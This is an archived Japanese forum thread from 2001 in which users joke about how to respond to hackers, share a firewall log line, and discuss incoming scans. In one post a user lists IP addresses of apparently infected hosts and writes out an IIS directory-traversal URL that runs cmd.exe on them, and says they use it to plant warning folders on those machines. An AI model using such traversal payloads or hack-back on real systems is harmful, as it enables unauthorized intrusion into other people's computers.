5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

__ハッカーあぼーん対策処理模擬試験(国立編)__

1 :呆れ太:01/10/20 19:59
近頃、増殖しているハッカー
嬉しいことに私の処にも訪問者がいた(藁
犯人はある程度は自らの中で候補者を絞りageていたのだが
絶対にこいつらだ!という確信までは持てなかった。
そこで、私はネット上に足跡を残すことにした。
結果、リスクを負っただけのことはあり
奴らは見事にエサに食いついてきた
そして確証を得たのである。
やはり貴様らか!!逝ってよし

さて、ハッカーの対策について正しいものを下記の1〜5の中から選びなさい
<注:解答には理由も書くこと>
解答例)ファイナルアンサーは1! 理由はあぼーんの相手をするだけ無駄


>1、あぼーんは完全無視する

>2、殺す

>3、警察に通報する

>4、彼方にできることは此方にもできるので
   同じ手法でやり返す

>5、裁判で金を盗る

2 : :01/10/20 20:18
8、盆栽を育てる
これが正解だろ

3 :1:01/10/20 20:20
>2

ワラタ

4 :(´ー`)y−~~~ :01/10/21 17:27
ハッカーあぼーん対策処理云々じゃなくて
ハッカーあぼーん対策云々の方が良かったんじゃないの

なんでもいいけど
ttp://isweb30.infoseek.co.jp/computer/iimail/jouhou.htm
こういうのにはなっちゃ駄目だよ。。。
>>1

5 :>4:01/10/21 20:19
何のpage?

6 :にむだむだ:01/10/21 20:28
そんなことより聞いてくれよ>>1よ。

202.229.228.91 202.39.106.17 202.93.254.93 202.131.116.228
202.122.66.90 202.96.112.80 202.110.93.239 202.104.128.164
202.184.31.11 210.0.220.26 210.15.56.101 211.106.43.38
210.214.6.116 210.83.155.246 210.29.152.80 202.110.182.153
210.83.127.121 210.110.64.23 210.93.58.106

ほぼ一日でこれだけのヴァカが、アクセスしてくるんだよ。
いい加減気づいて欲しいよ。ウィルスに感染しててるってよー。

http://IPアドレス/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

仕方ないから、

http://IPアドレス/scripts/..%252f../winnt/system32/cmd.exe?/c+md%20"\Please virus check your PC"

とかやって注意喚起してるんだけどさ。
いい加減ウザイよ。

7 :(´ー`)y−~~~ :01/10/21 20:37
よくわからんが
パケットと迷惑メールに対して
怒っているサイトみたいだね
>>5

8 :>7:01/10/22 01:09
逮捕きぼん

9 :名無しさん@お腹いっぱい。:01/10/23 02:22
ポート80番をいろいろ回ってくれる変なソフトで遊んでたら
BlackICEがぴかぴか赤く反応して
「このアタックは更に別の攻撃につながる可能性があります」
だってよ。
見事に回ってたところから受けた。このアタッカを排除してk

10 :ななしさん:01/10/23 22:38
>>9
その話詳しく聞かせてもらえませんか?
実はうちの会社のFirewallに変な攻撃が来てるのです。しかも、政府関係機関から2回。
政府系から攻撃が来るとも思えないので、まずは内部から疑ってみようと思います。
ちなみに、以下はFirewallのログです。
10/21/2001 17:15:14.048 - Probable TCP FIN scan - Source:210.169.1**.1, 80, WAN - Destination:211.*.1**.1**, 14362, LAN - -

11 :名無しさん@お腹いっぱい。:01/10/24 00:29
ステルススキャン?

12 :1:01/10/24 02:30
奴らまた訪問してきやがった
マジうぜぇ
我慢強い僕たんのタコメータも限界にきてます
臨界点を超えたら通報するしかねーなぁ
IPはシカーリメモしときました(藁

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)